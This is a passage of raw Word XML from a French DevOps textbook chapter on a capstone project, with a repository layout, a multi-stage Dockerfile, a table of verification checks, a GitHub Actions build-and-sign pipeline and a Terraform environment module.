        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="A63A32"/>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7ECEA"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LE PROJET SE JUGE SUR LE SYSTÈME, PAS SUR LE CODE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une application brillante déployée à la main ne satisfait pas le cahier des charges. À l'inverse, une application banale entièrement automatisée et observable le satisfait.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="0F2E4C"/>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8EDF1"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>DÉFINITION — LIVRABLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Élément vérifiable remis à la fin du projet : dépôt, pipeline, manifestes, documentation d'exploitation, journal d'incident simulé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.2 Architecture cible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le système tient dans un cluster unique. Trois environnements isolés partagent les mêmes manifestes, avec des surcouches de configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="110" name="Picture 110"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f108.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.108 — Les couches du système</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un dépôt, quatre responsabilités · text</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plateforme/</w:t>
        <w:br/>
        <w:t>├── app/                    # code applicatif et tests</w:t>
        <w:br/>
        <w:t>│   ├── Dockerfile</w:t>
        <w:br/>
        <w:t>│   └── src/</w:t>
        <w:br/>
        <w:t>├── infra/                  # Terraform : cluster, réseau, registre</w:t>
        <w:br/>
        <w:t>│   ├── modules/</w:t>
        <w:br/>
        <w:t>│   └── environnements/</w:t>
        <w:br/>
        <w:t>├── deploiement/            # manifestes Kubernetes</w:t>
        <w:br/>
        <w:t>│   ├── base/</w:t>
        <w:br/>
        <w:t>│   └── environnements/{recette,production}</w:t>
        <w:br/>
        <w:t>├── .github/workflows/      # CI/CD</w:t>
        <w:br/>
        <w:t>└── docs/                   # runbooks, décisions, objectifs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Séparer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>infra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deploiement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite qu'un changement de code déclenche un changement d'infrastructure. Les trois dépôts peuvent être distincts dans une organisation réelle ; un seul dépôt avec trois dossiers suffit ici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.3 Jalon 1 — Une application livrable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Avant d'automatiser, l'application doit se construire et se tester en une commande, sur une machine neuve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une image en trois étapes · dockerfile</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Dockerfile multi-étapes</w:t>
        <w:br/>
        <w:t>FROM node:22-alpine AS deps</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY package.json package-lock.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci --omit=dev</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM node:22-alpine AS build</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY package.json package-lock.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM node:22-alpine</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>ENV NODE_ENV=production</w:t>
        <w:br/>
        <w:t>COPY --from=deps /app/node_modules ./node_modules</w:t>
        <w:br/>
        <w:t>COPY --from=build /app/dist ./dist</w:t>
        <w:br/>
        <w:t>USER node</w:t>
        <w:br/>
        <w:t>EXPOSE 3000</w:t>
        <w:br/>
        <w:t>CMD ["node", "dist/serveur.js"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.371 — Cinq vérifications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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Attendu</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construction locale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docker build -t app .</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Succès</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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npm test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Tous verts</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image non privilégiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docker run --user 1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démarre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Taille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>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docker images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Moins de 200 Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Analyse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>trivy image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune faille critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.4 Jalon 2 — Un pipeline complet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le pipeline vérifie, construit, signe et publie. Il ne déploie pas directement : le déploiement appartient au dépôt de manifestes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un pipeline en deux tâches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name: livraison</w:t>
        <w:br/>
        <w:t>on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  push:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    branches: [main]</w:t>
        <w:br/>
        <w:br/>
        <w:t>permissions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  contents: read</w:t>
        <w:br/>
        <w:t xml:space="preserve">  packages: write</w:t>
        <w:br/>
        <w:t xml:space="preserve">  id-token: write</w:t>
        <w:br/>
        <w:br/>
        <w:t>jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  verifier:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runs-on: ubuntu-24.04</w:t>
        <w:br/>
        <w:t xml:space="preserve">    steps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/setup-node@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with: { node-version: 22, cache: npm }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm ci</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm run lint &amp;&amp; npm test</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  publier:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    needs: verifier</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runs-on: ubuntu-24.04</w:t>
        <w:br/>
        <w:t xml:space="preserve">    steps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: docker/login-action@v3</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          registry: ghcr.io</w:t>
        <w:br/>
        <w:t xml:space="preserve">          username: ${{ github.actor }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">          password: ${{ secrets.GITHUB_TOKEN }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: docker/build-push-action@v6</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          push: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">          tags: ghcr.io/${{ github.repository }}:${{ github.sha }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: sigstore/cosign-installer@v3</w:t>
        <w:br/>
        <w:t>- run: cosign sign --yes ghcr.io/${{ github.repository }}:${{ github.sha }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.372 — Quatre étapes et leurs preuves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87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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Preuve attendue</w:t>
            </w:r>
          </w:p>
        </w:tc>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Échec typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lint et tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Journal vert</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Test instable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Image publiée</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Dépendance manquante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attestation vérifiable</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Permission OIDC absente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Mise à jour du dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Demande de fusion automatique</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Jeton en lecture seule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.5 Jalon 3 — L'infrastructure décrite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cluster, le réseau et le registre sont décrits en Terraform. L'état est distant et verrouillé ; un second environnement peut être créé par changement de variables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un environnement paramétré · hcl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infra/environnements/recette/main.tf</w:t>
        <w:br/>
        <w:t>module "cluster" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  source = "../../modules/cluster"</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  nom           = "plateforme-recette"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  region        = "eu-west-3"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  noeuds_min    = 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  noeuds_max    = 4</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version_k8s   = "1.31"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>output "kubeconfig" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value     = module.cluster.kubeconfig</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sensitive = true</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="274B6D"/>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EFF4F8"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
